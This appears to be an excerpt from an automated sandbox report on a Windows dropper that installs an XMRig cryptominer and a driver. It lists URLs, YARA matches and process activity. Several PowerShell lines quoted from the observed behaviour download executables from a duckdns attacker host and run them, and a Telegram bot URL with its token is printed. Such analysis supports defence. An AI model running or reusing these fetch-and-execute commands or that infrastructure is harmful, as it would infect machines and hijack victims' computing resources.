Source: powershell.exe, 00000034.00000002.1953679928.000001DDA73A8000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe
Source: powershell.exe, 0000000F.00000002.1568050598.000001A3C9734000.00000004.00000020.00020000.00000000.sdmp, down.bat.0.dr String found in binary or memory: http://puredgb.duckdns.org:30000/hyar8z46/discord.exe
Source: 1.exe, 0000001B.00000002.1623996221.0000015ED19DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe
Source: 1.exe, 0000001B.00000002.1623996221.0000015ED19DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe4
Source: powershell.exe, 00000005.00000002.1502923504.00000237D3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CB331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDA9181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1569608171.000001A3CCA3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA7C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000034.00000002.1958573252.000001DDA93B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.1568050598.000001A3C9734000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000005.00000002.1502923504.00000237D3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CB331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDA9181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: curl.exe, 00000026.00000002.1708351275.0000020ECD720000.00000004.00000020.00020000.00000000.sdmp, ping.bat.31.dr, tmp.vbs.27.dr String found in binary or memory: https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=69151
Source: powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: 1.exe, 1.exe, 0000001B.00000000.1562896963.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe, 0000001B.00000002.1640875740.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe.15.dr String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 1.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 1.exe, 1.exe, 0000001B.00000000.1562896963.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe, 0000001B.00000002.1640875740.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe.15.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: 1.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: 1.exe, 1.exe, 0000001B.00000000.1562896963.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe, 0000001B.00000002.1640875740.00007FF7033FE000.00000002.00000001.01000000.0000000E.sdmp, 1.exe.15.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 1.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: powershell.exe, 00000034.00000002.1958573252.000001DDA93B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1502923504.00000237D4702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CBF62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA2F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: 1.exe.15.dr String found in binary or memory: https://ibb.co/pjHVbzL).
Source: powershell.exe, 00000005.00000002.1502923504.00000237D54CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1523797600.00000237E3B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1523797600.00000237E3C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1863548898.000001A3DB3AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1569608171.000001A3CCC1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1863548898.000001A3DB4E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2098753639.000001DDB9330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2098753639.000001DDB91FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAAA70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.1569608171.000001A3CCA3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA7C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000F.00000002.1569608171.000001A3CCA3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1958573252.000001DDAA7C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, xmrig.exe.6.dr String found in binary or memory: https://xmrig.com/benchmark/%s
Source: 6.exe, 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, xmrig.exe.6.dr String found in binary or memory: https://xmrig.com/docs/algorithms
Source: 6.exe, 00000006.00000003.1511481148.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1511270372.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1511784936.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1510430092.000001B664124000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, xmrig.exe.6.dr String found in binary or memory: https://xmrig.com/wizard
Source: 6.exe, 00000006.00000003.1511481148.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1511270372.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1511784936.000001B664128000.00000004.00000020.00020000.00000000.sdmp, 6.exe, 00000006.00000003.1510430092.000001B664124000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, xmrig.exe.6.dr String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49713 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6.3.6.exe.1b665fa72bc.1.raw.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.0.xmrig.exe.7ff750e90000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 6.3.6.exe.1b665fa72bc.1.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000015.00000000.1543578231.00007FF75148F000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000015.00000000.1542891226.00007FF750E91000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 00000006.00000003.1507397894.000001B6665A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000006.00000003.1507397894.000001B665FA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: Process Memory Space: 6.exe PID: 4272, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: xmrig.exe PID: 1308, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\ProgramData\Drivers\xmrig.exe, type: DROPPED Matched rule: Detects coinmining malware Author: ditekSHen
Potential malicious VBS script found (suspicious strings)
Source: C:\Users\user\AppData\Roaming\1.exe Dropped file: 2pK[\ r\H8xHH8H8X8@8H8h H`x8bdh(ee`(eHe e( XeXX`ePh.8tXVBj 4R@.f$:\jxxl\L>2*xfXL2n^L>0F xSendMessageWShowWindow)GetDlgItemSetDlgItemTextWEnableWindowSetWindowTextWGetWindowTextWGetWindowTextLengthWfGetParentSetWindowPosGetSystemMetricsGetClientRectGetWindowRectGetWindowLongWSetWindowLongWGetWindowLongPtrWSetProcessDefaultLayoutGetWindowLoadStringW&OemToCharBuffA<CharUpperWDefWindowProcWQRegisterClassExWnCreateWindowExWIsWindowDestroyWindowUpdateWindowMapWindowPointsUCopyRectSetWindowLongPtrWLoadCursorW#GetDCiReleaseDCMessageBoxWFindWindowExWGetClassNameWTCopyImage_GetMessageWTranslateMessageDispatchMessageW7PeekMessageW:PostMessageW.WaitForInputIdleIsWindowVisibleDialogBoxParamWEndDialog,GetDlgItemTextWwSendDlgItemMessageWSetFocusSetForegroundWindow}GetSysColorLoadBitmapWLoadIconWDestroyIconIsDialogMessageW/CreateCompatibleBitmap0CreateCompatibleDCDeleteDCDeleteObjectGetDeviceCapswSelectObjectStretchBlt5CreateDIBSectionGetObjectWG Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1.exe Dropped file: "6Hbx:Pfp|NB`t6JLocalFreeGetLastErrorSetLastErrordFormatMessageWGetCurrentProcessDeviceIoControlxSetFileTimeRCloseHandleRemoveDirectoryWCreateFileWDeleteFileWCreateHardLinkWhGetShortPathNameWGetLongPathNameWeMoveFileWGetFileTypekGetStdHandle4WriteFileReadFile]FlushFileBuffersaSetEndOfFiletSetFilePointerGetCurrentProcessIdCreateDirectoryWoSetFileAttributesWGetFileAttributesW4FindClose?FindFirstFileWKFindNextFileWGetVersionExWGetModuleFileNameW[SetCurrentDirectoryWGetCurrentDirectoryWGetFullPathNameWbFoldStringWGetModuleHandleWTFindResourceWhFreeLibraryLGetProcAddress#ExpandEnvironmentStringsWExitProcessSetThreadExecutionStateSleepALoadLibraryWwGetSystemDirectoryWdCompareStringWAllocConsoleeFreeConsoleAttachConsole3WriteConsoleWMGetProcessAffinityMaskCreateThreadSetThreadPriorityInitializeCriticalSectionEnterCriticalSection;LeaveCriticalSectionDeleteCriticalSectiongSetEventResetEventReleaseSemaphoreWaitForSingleObjectCreateEventWCreateSemaphoreW~GetSystemTimeSystemTimeToTzSpecificLocalTimeTzSpecificLocalTimeToSystemTimeSystemTimeToFileTime*FileTimeToLocalFileTimeHLocalFileTimeToFileTime+FileTimeToSystemTimexGetCPInfoIsDBCSLeadByteiMultiByteToWideChar WideCharToMultiByteGlobalAllocVLockResourceGlobalLockGlobalUnlockGlobalFreeGlobalMemoryStatusExCLoadResourceSizeofResourceGetTimeFormatWGetDateFormatWGetExitCodeProcessGetLocalTimeGetTickCountYMapViewOfFileUnmapViewOfFileCreateFileMappingW{OpenFileMappingWGetCommandLineWeSetEnvironmentVariableWGetTempPathWbMoveFileExWGetLocaleInfoW:GetNumberFormatWKERNEL32.dllOLEAUT32.dll!GdipAllocGdipFree6GdipCloneImageGdipDisposeImageQGdipCreateBitmapFromStream_GdipCreateHBITMAPFromBitmapuGdiplusStartuptGdiplusShutdowngdiplus.dllRaiseExceptionzGetSystemInfoVirtualProtectVirtualQuery?LoadLibraryExARtlCaptureContextRtlLookupFunctionEntry&RtlVirtualUnwindUnhandledExceptionFilterSetUnhandledExceptionFilterTerminateProcessIsProcessorFeaturePresentInitializeCriticalSectionAndSpinCountWaitForSingleObjectExIsDebuggerPresentjGetStartupInfoWQueryPerformanceCounterGetCurrentThreadIdGetSystemTimeAsFileTimeInitializeSListHead!RtlPcToFileHeader%RtlUnwindExEncodePointerTlsAllocTlsGetValueTlsSetValueTlsFree@LoadLibraryExWQueryPerformanceFrequencyGetModuleHandleExWGetModuleFileNameAnGetACPHeapFreeHeapAllocpGetStri Jump to dropped file
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\6.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\1.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\2.exe Jump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" " Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Abnormal high CPU Usage
Source: C:\ProgramData\Drivers\xmrig.exe Process Stats: CPU usage > 49%
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329C308: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF73329C308
Creates driver files
Source: C:\Users\user\AppData\Roaming\6.exe File created: C:\ProgramData\Drivers\WinRing0x64.sys Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C03B4 0_2_00007FF7332C03B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AA1CC 0_2_00007FF7332AA1CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329F8F0 0_2_00007FF73329F8F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B1B80 0_2_00007FF7332B1B80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BCAE8 0_2_00007FF7332BCAE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B30E4 0_2_00007FF7332B30E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF733295E30 0_2_00007FF733295E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BADF0 0_2_00007FF7332BADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332CC498 0_2_00007FF7332CC498
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AB250 0_2_00007FF7332AB250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF733297288 0_2_00007FF733297288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329C308 0_2_00007FF73329C308
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329A304 0_2_00007FF73329A304
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A11D4 0_2_00007FF7332A11D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D21B0 0_2_00007FF7332D21B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF733294840 0_2_00007FF733294840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C887C 0_2_00007FF7332C887C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A58D4 0_2_00007FF7332A58D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AB8AC 0_2_00007FF7332AB8AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D5758 0_2_00007FF7332D5758
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B47F8 0_2_00007FF7332B47F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AC688 0_2_00007FF7332AC688
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329A66C 0_2_00007FF73329A66C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332976C0 0_2_00007FF7332976C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B2710 0_2_00007FF7332B2710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332CF6F4 0_2_00007FF7332CF6F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B35C4 0_2_00007FF7332B35C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C8600 0_2_00007FF7332C8600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AAC34 0_2_00007FF7332AAC34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D1CE0 0_2_00007FF7332D1CE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C03B4 0_2_00007FF7332C03B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B8A54 0_2_00007FF7332B8A54
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A1A5C 0_2_00007FF7332A1A5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF733291AA4 0_2_00007FF733291AA4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B29B8 0_2_00007FF7332B29B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B5050 0_2_00007FF7332B5050
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B1E30 0_2_00007FF7332B1E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AEE74 0_2_00007FF7332AEE74
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C570F8F0 6_2_00007FF6C570F8F0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571A1CC 6_2_00007FF6C571A1CC
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57303B4 6_2_00007FF6C57303B4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C572ADF0 6_2_00007FF6C572ADF0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5705E30 6_2_00007FF6C5705E30
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57230E4 6_2_00007FF6C57230E4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C572CAE8 6_2_00007FF6C572CAE8
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5721B80 6_2_00007FF6C5721B80
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573F6F4 6_2_00007FF6C573F6F4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5722710 6_2_00007FF6C5722710
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C570A66C 6_2_00007FF6C570A66C
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571C688 6_2_00007FF6C571C688
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57076C0 6_2_00007FF6C57076C0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57235C4 6_2_00007FF6C57235C4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5738600 6_2_00007FF6C5738600
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57158D4 6_2_00007FF6C57158D4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5704840 6_2_00007FF6C5704840
